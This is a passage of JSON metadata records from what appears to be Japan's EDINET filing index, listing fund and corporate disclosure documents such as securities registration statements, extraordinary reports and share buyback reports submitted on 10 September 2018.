"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 68,
"docID": "S100E1VP",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12760",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:15",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100BLZT",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 69,
"docID": "S100E2FF",
"edinetCode": "E03867",
"secCode": "88180",
"JCN": "6120001078852",
"filerName": "京阪神ビルディング株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 70,
"docID": "S100DZQN",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08824",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 71,
"docID": "S100DMAA",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11857",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:16",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第23期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 72,
"docID": "S100E2SA",
"edinetCode": "E04005",
"secCode": "89090",
"JCN": "3290001020676",
"filerName": "株式会社シノケングループ",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:16",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 73,
"docID": "S100E01O",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01295",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 74,
"docID": "S100DYXZ",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10935",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 75,
"docID": "S100DZYU",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G03651",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:17",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第30期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 76,
"docID": "S100DYQ3",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G05226",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:18",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGD2",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 77,
"docID": "S100E01P",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01295",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:19",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDW",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 78,
"docID": "S100E2YI",
"edinetCode": "E01651",
"secCode": "63470",
"JCN": "6030001018165",
"filerName": "株式会社プラコー",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:19",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 79,
"docID": "S100DMA9",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11857",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:21",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 80,
"docID": "S100E29G",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G13127",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:21",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 81,
"docID": "S100E24N",
"edinetCode": "E12963",
"secCode": null,
"JCN": "2010401034817",
"filerName": "ステート・ストリート・グローバル・アドバイザーズ株式会社",
"fundCode": "G08488",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:22",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 82,
"docID": "S100E05Y",
"edinetCode": "E12566",
"secCode": null,
"JCN": "2010001066780",
"filerName": "イーストスプリング・インベストメンツ株式会社",
"fundCode": "G09277",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:22",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第10期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 83,
"docID": "S100E044",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01293",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:22",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 84,
"docID": "S100E2ST",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G03677",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:22",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 85,
"docID": "S100E2SV",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G04914",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:24",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 86,
"docID": "S100E045",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01293",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:24",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDQ",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 87,
"docID": "S100DYLC",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11002",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:24",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第28期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 88,
"docID": "S100DMAE",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11919",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:25",
"docDescription": "半期報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 89,
"docID": "S100DYLD",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11002",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:25",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 90,
"docID": "S100E04B",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01294",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:26",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 91,
"docID": "S100E04D",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01294",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:28",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFDC",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 92,
"docID": "S100E049",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10995",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:28",
"docDescription": "半期報告書(内国投資信託受益証券)-第5期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 93,
"docID": "S100E062",
"edinetCode": "E12566",
"secCode": null,
"JCN": "2010001066780",
"filerName": "イーストスプリング・インベストメンツ株式会社",
"fundCode": "G09277",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:28",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 94,
"docID": "S100E1F4",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01379",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 95,
"docID": "S100E04F",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10995",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CGEH",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 96,
"docID": "S100E2SW",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G07654",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:29",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 97,
"docID": "S100E1F5",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05027",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:30",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 98,
"docID": "S100DXXS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G03129",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:31",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 99,
"docID": "S100E1F7",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G05146",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:31",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 100,
"docID": "S100E04M",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01296",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:31",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 101,
"docID": "S100E1F8",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08852",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:31",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 102,
"docID": "S100E2SY",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G10291",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 103,
"docID": "S100E04O",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01296",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFE9",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 104,
"docID": "S100E1F9",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10990",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:32",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 105,
"docID": "S100DXXV",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G03129",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 106,
"docID": "S100DMAC",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11919",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:33",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
